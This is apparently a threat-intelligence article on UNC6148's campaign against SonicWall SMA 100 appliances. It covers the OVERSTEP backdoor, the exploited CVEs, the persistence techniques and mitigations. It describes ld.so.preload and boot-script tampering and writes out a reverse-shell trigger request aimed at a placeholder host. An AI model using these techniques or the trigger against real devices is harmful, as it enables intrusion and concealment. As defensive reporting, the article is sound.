SonicWall’s Secure Mobile Access (SMA) 100 series appliances, particularly those that have reached end-of-life status, are at the center of a sophisticated cyberattack campaign. This operation leverages a suspected zero-day remote code execution (RCE) vulnerability to deploy a backdoor known as OVERSTEP, culminating in the deployment of ransomware.
Attack Overview
The financially motivated threat group UNC6148 is believed to be behind this campaign. Their attack sequence initiates with the theft of administrator credentials and one-time password (OTP) seeds. Following this, they achieve full device compromise, exfiltrate sensitive data, and set the stage for ransomware deployment.
The intrusion begins with a series of HTTP requests that grant the attackers a shell on the targeted appliance—an action that should be impossible under normal circumstances. Once this shell is established, the attackers export the device’s configuration, inject malicious rules, and upload a base64-encoded binary into the persistent `/cf` partition. This binary is subsequently copied to `/usr/lib/libsamba-errors.so.6` and force-loaded on every process start via `/etc/ld.so.preload`, providing the attackers with root-level access across the appliance.
Exploited Vulnerabilities
Investigations have linked the initial compromise to several longstanding SMA vulnerabilities that are frequently traded in cybercrime forums. Notably, the following vulnerabilities have been exploited in related campaigns over the past three years:
– CVE-2021-20038 (2021): A memory corruption vulnerability allowing unauthenticated remote code execution.
– CVE-2024-38475 (2024): A path traversal flaw enabling attackers to dump `temp.db` and `persist.db` files, leading to the theft of passwords and OTP seeds.
– CVE-2021-20035 (2021): A command injection vulnerability in the `/cgi-bin/sitecustomization` handler, permitting remote code execution.
– CVE-2021-20039 (2021): A command injection flaw in the `/cgi-bin/viewcert` handler, associated with the Abyss ransomware.
– CVE-2025-32819 (2025): A file deletion vulnerability that resets the built-in admin password to `password`.
These vulnerabilities have been exploited to gain unauthorized access, execute arbitrary code, and steal sensitive information from affected devices.
Persistence Mechanisms
After establishing initial access, UNC6148 ensures persistent control over the compromised devices by modifying the boot sequence. They rewrite the `bootCurrentFirmware()` routine within `/etc/rc.d/rc.fwboot`. This altered script mounts the device’s compressed initial RAM disk (`INITRD`), implants the trojanized library, and rewrites `INITRD.GZ` so that the malicious code loads before any legitimate service. A timestamp operation aligns file dates with the official kernel image, complicating detection through metadata checks.
Upon reboot, every dynamic binary, including the web server responsible for logging, links against the malicious library. OVERSTEP hooks functions such as `open`, `readdir`, and `write` to conceal its presence and parse inbound buffers for specific strings like `dobackshell` or `dopasswords`. A simple HTTP GET request, such as `https://device/query?q=dobackshell,1.2.3.4,4444`, can trigger a reverse shell without leaving disk logs, thanks to in-memory log tampering executed within the hijacked `write` call.
Mitigation Recommendations
Organizations utilizing SonicWall SMA 100 series appliances, especially those that are end-of-life, should take immediate action to mitigate the risks associated with this campaign:
1. Apply Security Patches: Ensure that all devices are updated to the latest firmware versions that address known vulnerabilities.
2. Restrict Administrative Access: Limit access to management interfaces to trusted IP addresses and implement multi-factor authentication (MFA) to enhance security.
3. Monitor for Unusual Activity: Regularly review logs and network traffic for signs of unauthorized access or anomalous behavior.
4. Implement Network Segmentation: Isolate critical systems from potentially compromised devices to prevent lateral movement by attackers.
5. Develop an Incident Response Plan: Establish and regularly update procedures for responding to security incidents, including steps for containment, eradication, and recovery.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can reduce the risk of compromise and protect their critical assets from sophisticated cyber threats.
